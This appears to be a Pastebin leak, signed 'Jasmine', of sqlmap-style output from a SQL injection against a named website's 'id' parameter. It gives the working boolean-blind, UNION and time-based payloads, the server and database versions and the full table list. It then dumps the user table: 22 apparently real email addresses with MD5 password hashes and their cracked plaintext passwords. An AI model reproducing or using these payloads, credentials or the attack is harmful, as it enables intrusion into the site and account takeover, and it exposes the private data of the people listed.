Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /\ /\
- { `---' }
- { O O }
- ~~> V <~~
- \ \|/ /
- `-----'____
- / \ \_
- { }\ )_\_ _
- | \_/ |/ / \_\_/ )
- \__/ /(_/ \__/
- (__/
- Jasmine
- -----------------------------------------------
- http://g2mi.com/static.php?id=11
- -----------------------------------------------
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=11' AND 7731=7731 AND 'VmLN'='VmLN
- Type: UNION query
- Title: MySQL UNION query (NULL) - 1 column
- Payload: id=-3664' UNION ALL SELECT CONCAT(0x7165676f71,0x655248564f6174594d4d,0x7177656471)#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: id=11' AND SLEEP(5) AND 'OFLo'='OFLo
- ---
- [23:49:59] [INFO] the back-end DBMS is MySQL
- web application technology: Apache, PHP 5.4.35
- back-end DBMS: MySQL 5.0.11
- [23:49:59] [INFO] fetching database names
- [23:50:00] [INFO] the SQL query used returns 2 entries
- [23:50:01] [INFO] retrieved: "information_schema"
- [23:50:02] [INFO] retrieved: "db240960196"
- available databases [2]:
- [*] db240960196
- [*] information_schema
- -------------------------------------------------
- Database: db240960196
- [113 tables]
- +----------------------------+
- | tblAccessControl |
- | tblAccessProductPackage |
- | tblActivities |
- | tblActivities_web |
- | tblActivitiesl1 |
- | tblActivitySector |
- | tblAdvertisement |
- | tblAdvertisementCategory |
- | tblAgentAccessControl |
- | tblAgents |
- | tblAssignments |
- | tblAuthor |
- | tblCategory |
- | tblCompany |
- | tblCompanyOwnership |
- | tblCompanyOwnership_web |
- | tblCompanyOwnershipl1 |
- | tblCompanyRegistration |
- | tblCompanyStaff |
- | tblCompanyStaff_web |
- | tblCompanyStaffl1 |
- | tblCompanyType |
- | tblCompany_web |
- | tblCompany_web1 |
- | tblCompanyl1 |
- | tblCountry |
- | tblCountryRegion |
- | tblCurrencies |
- | tblCustomer |
- | tblDataType |
- | tblDescription |
- | tblDescription_web |
- | tblDescriptionl1 |
- | tblDesignation |
- | tblDocumentType |
- | tblDocuments |
- | tblDocuments_web |
- | tblDocumentsl1 |
- | tblEntityData |
- | tblEntityData_30_july_2013 |
- | tblEntityFinancial |
- | tblEntityType |
- | tblFeaturedCompany |
- | tblFooterPages |
- | tblFormat |
- | tblGeography |
- | tblGeography_web |
- | tblGeographyl1 |
- | tblGroupFinancial |
- | tblGroupFinancial_web |
- | tblGroupFinanciall1 |
- | tblHelpText |
- | tblHomePageNews |
- | tblIcon |
- | tblIntrimFinancials |
- | tblInvestmentActivity |
- | tblInvestmentActivityType |
- | tblInvestmentActivity_web |
- | tblInvestmentActivityl1 |
- | tblItemDetails |
- | tblItemType |
- | tblLastFullYearTag |
- | tblMEDCategory |
- | tblMEDLibrary |
- | tblMajorPlayers |
- | tblMajorPlayers_web |
- | tblMajorPlayersl1 |
- | tblMediaLibrary |
- | tblMenu |
- | tblNewsLetter |
- | tblPrimaryStockExchange |
- | tblPriority |
- | tblProduct |
- | tblProductPackage |
- | tblProfit |
- | tblProfit_web |
- | tblProfitl1 |
- | tblProgress |
- | tblRegion |
- | tblReportType |
- | tblRevenue |
- | tblRevenue_web |
- | tblRevenuel1 |
- | tblRole |
- | tblSector |
- | tblSectorStructure |
- | tblSectorStructure_web |
- | tblSectorStructurel1 |
- | tblSectorValue |
- | tblSectorValue_web |
- | tblSectorValuel1 |
- | tblSectorVolume |
- | tblSectorVolume_web |
- | tblSectorVolumel1 |
- | tblSize |
- | tblSize_web |
- | tblSizel1 |
- | tblStaticPages |
- | tblStaticType |
- | tblStatic_Content |
- | tblSyncLog |
- | tblTimePeriod |
- | tblTransactionData |
- | tblTransactionHistory |
- | tblTransactionHistory_web |
- | tblTransactionHistoryl1 |
- | tblUoM |
- | tblUser |
- | tblUserLog |
- | tblVolume |
- | tblYears |
- | tbl_country_sector_details |
- | tblstate |
- +----------------------------+
- Database: db240960196
- Table: tblUser
- [5 columns]
- +-----------+---------------+
- | Column | Type |
- +-----------+---------------+
- | createdOn | datetime |
- | password | varchar(100) |
- | Status | enum('Y','N') |
- | type | varchar(100) |
- | userName | varchar(255) |
- +-----------+---------------+
- Database: db240960196
- Table: tblUser
- [22 entries]
- +---------+---------------------------+----------------------------------+
- | type | userName | password |
- +---------+---------------------------+----------------------------------+
- | <blank> | amitsoni@aohost.net | 5ebe2294ecd0e0f08eab7690d2a6ee69 |--> secret
- | <blank> | amitsoni@fortunespace.com | 5ebe2294ecd0e0f08eab7690d2a6ee69 |--> secret
- | <blank> | ashish@aohost.net | 6ef422ab1fb100b52703fb7499bf2a59 |--> 83aa
- | <blank> | harjinder@heernet.com | d4f7a71af8d127416eee27d405e6e9dc |--> a34f
- | <blank> | hsinghheer@yahoo.co.uk | 64322cd9864b443cb6c1768b10043f39 |--> 07d3
- | <blank> | HarjinderS@aa.com | 5f4dcc3b5aa765d61d8327deb882cf99 |--> password
- | <blank> | careers@heernet.com | 5f4dcc3b5aa765d61d8327deb882cf99 |--> password
- | <blank> | rfsdtferrt@dd.com | ece926d8c0356205276a45266d361161 |--> ffff
- | <blank> | lijkh@ii.com | 2d7acadf10224ffdabeab505970a8934 |--> pppp
- | <blank> | indi@gg.com | 5f4dcc3b5aa765d61d8327deb882cf99 |--> password
- | <blank> | qqq@ss.com | 3bad6af0fa4b8b330d162e19938ee981 |--> qqqq
- | <blank> | bf@bf.com | d0970714757783e6cf17b26fb8e2298f |--> 112233
- | <blank> | ohoi@,hhb.com | 827ccb0eea8a706c4c34a16891f84e7b |--> 12345
- | <blank> | hsin@yahoo.co.uk | a722c63db8ec8625af6cf71cb8c2d939 |--> pass1
- | <blank> | manveers@hotmail.co.uk | 3c60653280e25c1ba1bd7e06320175e4 |--> redwater12
- | <blank> | amitsoni9999@gmail.com | 5ebe2294ecd0e0f08eab7690d2a6ee69 |--> secret
- | <blank> | rajat@heernet.com | f4fe0ab8774652e770fe5a4fd0869248 |--> 14e1
- | <blank> | test@hg.com | 1a1dc91c907325c69271ddf0c944bc72 |--> pass
- | <blank> | raj@ajay.com | 79cfac6387e0d582f83a29a04d0bcdc4 |--> kumar
- | <blank> | heernet1@gmail.com | 5f4dcc3b5aa765d61d8327deb882cf99 |--> password
- | <blank> | poof1@gmail.com | 5f4dcc3b5aa765d61d8327deb882cf99 |--> password
- | <blank> | heernettest1@gmail.com | 5f4dcc3b5aa765d61d8327deb882cf99 |--> password
- +---------+---------------------------+----------------------------------+
Add Comment
Please, Sign In to add comment